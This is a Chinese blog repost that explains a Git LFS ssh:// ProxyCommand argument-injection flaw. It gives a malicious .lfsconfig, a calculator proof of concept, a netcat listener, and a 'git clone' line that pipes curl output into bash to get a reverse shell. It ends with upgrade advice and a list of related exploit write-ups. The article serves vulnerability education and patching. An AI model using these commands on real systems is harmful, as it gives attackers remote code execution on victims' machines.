Git命令执行漏洞

最新推荐文章于 2024-05-27 10:17:21 发布
最新推荐文章于 2024-05-27 10:17:21 发布
阅读量220 收藏 1
点赞数
文章标签: git 运维 shell
原文链接:http://www.cnblogs.com/zhaijiahui/p/7351594.html
版权

Git命令造成的反弹shell

 

漏洞描述:

  Git LFS可以.lfsconfig使用LFS由存储库中的文件配置(部分),并且可以将Git LFS指向ssh://。

[lfs]
    url = ssh://-oProxyCommand= some-command

  当使用这样的.lfsconfig文件克隆存储库时,使用LFS插件的Git将尝试调用ssh以从主机获取LFS对象 -oProxyCommand=some-command。然而,SSH会将该主机名解释为一个-o选项,并随后尝试调用some-command以建立连接。

  这样的话,可以通过克隆存储库的Git LFS客户端的精心设计的存储库来执行任意命令。

 

  通过在新项目中导入存储库,ssh://可以在GitLab主机上执行URL服务器端代码执行。

 

利用方式:

  远程钓鱼,社工

  恶意的攻击者可以向受害者发送一条精心构造的ssh:// URL链接,当受害者访问这条URL则会触发漏洞导致执行恶意代码。

 

漏洞证明:

   反弹计算器

git clone ssh://-oProxyCommand=gnome-calculator/wat

 

 

  进一步利用

 

  本机测试环境

  先建立监听

nc -vlp 9999

  利用git clone 获取镜像库

git clone ssh://-oProxyCommand='curl 127.0.0.1:9999 | bash'/xx

命令被成功执行

 

 

建立连接之后,尝试执行反弹shell命令,同时监听新的端口,完成反弹shell。

 

 

 

漏洞修复建议(或缓解措施):

 

Git:升级到Git v2.14.1版本

Apache Subversion:升级到Subversion 1.8.19、Subversion 1.9.7版本

Mercurial:升级到Mercurial 4.3 and 4.2.3.版本

 

 

参考文章:

https://help.aliyun.com/knowledge_detail/57887.html

http://bobao.360.cn/news/detail/4260.html?spm=5176.7757887.2.2.IkQv67

转载于:https://www.cnblogs.com/zhaijiahui/p/7351594.html

weixin_30414635
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Vulnhub复现漏洞 - Gitlist 0.6.0 远程命令执行漏洞
JiangBuLiu的博客
07-08 785
gitlist 0.6.0 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现端口拦截发送数据包: Vulnhub官方复现教程 【https://vulhub.org/#/environments/httpd/ssi-rce/】 漏洞原理 在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令: public function searchTree($q...
Git远程命令执行漏洞升级
周奕儒的博客
10-12 460
查看本地git版本,cmd->git –version https://mp.weixin.qq.com/s/8ccCxij6XI90sfJzvpkDVg登录网址对比版本 3、https://mirrors.edge.kernel.org/pub/software/scm/git/ 下载最新版本(Git v2.19.1, v2.14.5, v2.15.3, v2.16.5, v2....
git泄露漏洞总结
weixin_66839513的博客
04-02 2155
Git泄露是指在使用Git版本控制系统时,由于配置不当或者操作失误,导致敏感信息(如密码、密钥、源代码等)被意外地上传到公开的代码仓库或者其他公开可访问的地方,从而被未授权的人获取到。
GITGit 命令执行(备忘)
Zsigner的博客
01-17 247
背景:现在越来越多的IDE 开发工具,如:idea都集成了git命令可视化操作,不过有时候需要用到git bash窗口在此做一个备忘 1.新建(-b)/删除(-d)一个本地分支: git checkout -b mybranch git branch -d mybranch 2.查看所有分支状态 git branch -a 3.把新建的本地分支push到远程服务器,远程分...
XCTF-MFW Git泄露,命令执行漏洞 详解
AAAAAAAAAAAA66的博客
11-15 1256
最近自学了1个月的CTFweb题,参加比赛一道题都没做出来,有点自闭,但还是告诉自己要慢慢来,有意向打CTF的同学可以私信,一起学习。 目录 题目 解题过程 总结 题目 解题过程 工具 思路 过程 总结 ...
203-git基本命令执行
Lich Howger
01-05 549
git基本命令执行 安装git sudo apt-get install git 安装成功后,执行 git 然后我们创建一个版本库 git init 然后会在目录下创建一个.git隐藏目录 这就是版本库目录 然后我们创建一个文件text.txt vim test.txt 然后我们添加文件 git add test.txt 然后我们提交一下 git comm...
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)1
08-04
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)Jenkins Git client插件命令执行漏洞(CVE-2019-10
Go代码审计:Gitea远程命令执行漏洞
02-24
这是本漏洞链的导火索,其出现在GitLFS的处理逻辑中。GitLFSGit为大文件设置的存储容器,我们可以理解为,他将真正的文件存储在git仓库外,而git仓库中只存储了这个文件的索引(一个哈希值)。这样,gitobjects和....
goengine:Golang脚本执行漏洞审查
03-20
政府评论Golang脚本执行漏洞审查设置通过去go get -u github.com/manasmbellani/goengine/src/goengine通过git clone git clone github.com/manasmbellani/goengine /opt/goenginecd /opt/goengine./setup.sh用法在...
Githack:利用git目录结构读取源代码工具
03-24
脚本不需要执行额外的git命令,所有您需要的是python 脚本无需浏览目录 可能的改进## 存在文件被gc打包到git \ objects \ pack的情况,以后可测试下看能否直接获取并解压这个文件,还原源代码 #
Git严重漏洞,远程执行代码,Mac和Windows通杀!
最新发布
IT界那些事儿
05-27 8046
不得了了,家人们!就在这几天,Git爆出了一个严重漏洞,编号,一个可以远程执行代码的RCE漏洞!攻击者精心准备一个Git项目,只要你尝试去Clone它,你的电脑就能执行攻击代码沦陷。比如下面这个GitHub上面的项目:你可以执行一下下面的命令:不出意外的话,你的电脑将会弹出计算器程序:能让你弹计算器,就能执行其他更危险的操作,比如给你种木马等等。Git是我们程序员基本离不开的工具,这波漏洞操作,属实是对程序员定向打击了。接下来我们来理一理这个漏洞的工作原理是怎么样的。
GIT远程代码执行漏洞修复
hanjingjava的专栏
07-17 499
两个安全漏洞 CVE-2018-11233 和 CVE-2018-11235 恶意攻击者可借此漏洞创建包含特殊 Git 子模块的 Git 仓库 修复方法,尽快升级新版本git: windows 下载安装新版本Git for Windows (version 2.17.1) ,网址 https://gitforwindows.org/. mac brew install git lin...
Git 命令行操作
orca123456的博客
12-10 1061
下载地址 Msysgit https://git-scm.com/download.win 配置代理 //配置 git config --global https.proxy http://127.0.0.1:1080 git config --global https.proxy https://127.0.0.1:1080 git config --global http.proxy ‘soc...
gitlist 0.6.0 远程命令执行漏洞
黑白的博客
12-23 457
声明 好好学习,天天向上 漏洞描述 gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞。 影响范围 0.6.0 复现过程 这里使用0.6.0版本 使用vulhub /app/vulhub-master/gitlist/0.6.0-rce 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问 http://192.168.239.129:8080 发送
CVE-2020-27955 Git-LFS远程代码执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
06-10 1265
0x01 漏洞简介 Git LFSGithub开发的一个Git扩展,用于实现Git对大文件的支持。Windows平台上的Git-LFS版本<= 2.12上发现远程代码执行问题,一旦受害者克隆了恶意存储库并在其系统上运行了易受攻击的Git-LFS版本,就会立即执行有效载荷,漏洞编号为CVE-2020-27955。 0x02 影响版本 Git<=2.29.2、Git-LFS<=2.12,一些受影响的产品包括GitGitHub CLI,GitHub Desktop,Visual Studio
常用 Git 命令清单
chewo1632的博客
04-24 156
下面是我整理的常用 Git 命令清单。几个专用名词的译名如下。 Workspace:工作区 Index / Stage:暂存区 Repository:仓库区(或本地仓库) Remote:远程仓库 一、新建代码库 # 在当前...
vulhub漏洞复现-Gitlist 0.6.0(cve-2018-1000533)远程命令执行漏洞
遇事不决冲冲冲
10-20 5155
Gitlist gitlist是一款使用PHP开发的图形化git仓库查看工具。 思路 在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令: public function searchTree($query, $branch) { if (empty($query)) { return null; } $query = escapeshellarg($query); try { $results = $this-&
Git常用命令及使用流程
weixin_54161951的博客
05-24 74
git pull [shortname] [branch] [==allow-unrelated-histories] 表示当自己init之后再在本地仓库创建有文件,链接上remote库之后,到pull时直接pull会报错,该指令可以忽略历史记录 强制pull。标签相当于一个静态节点,起到版本控制作用,类似游戏里的存档 一旦检出到某个存档点,从改存档点之后的操作就会消失,而分支就是继该存档点之后的游玩路线(相当于游戏数据,未再次保存为存档点之前的)需要init,执行默认创建名为master的本地分支。
win7 git 2.19.2
05-12
Git Bash是一个在Windows环境下实现的类Unix终端,它提供了一个类似于Linux的命令行界面,用户可以在其中执行Git命令Git 2.19.2带来了一些重大的改进和性能优化。例如,在Git 2.19.2中,增加了几个新的命令来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值